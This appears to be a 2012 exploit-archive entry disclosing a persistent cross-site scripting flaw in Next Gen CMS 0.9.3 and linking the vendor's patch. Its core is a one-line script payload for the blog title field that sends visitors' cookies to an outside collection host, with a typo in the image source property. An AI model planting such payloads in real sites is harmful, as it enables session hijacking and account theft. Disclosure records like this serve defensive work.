Next Gen CMS XSS Presistent Vulnerability
| EKU-ID: 2069 | CVE: | OSVDB-ID: |
| Author: mix0x0 | Published: 2012-05-07 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 2069 | CVE: | OSVDB-ID: |
| Author: mix0x0 | Published: 2012-05-07 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: [ACTIVE XSS] Next Gen CMS
# Author: mix0x0
# Vendor or Software Link: http://ngcms.ru/
# Version: 0.9.3 Release [SVN880+FIX01]
# Vulnerable to the field: "title", test blog*
# Exploit (test): <script>var t = new Image(); t.scr="http://site.com/cookie.php?"+document.cookie;</script>
# Patch: http://trac.assembla.com/ngcms/changeset/990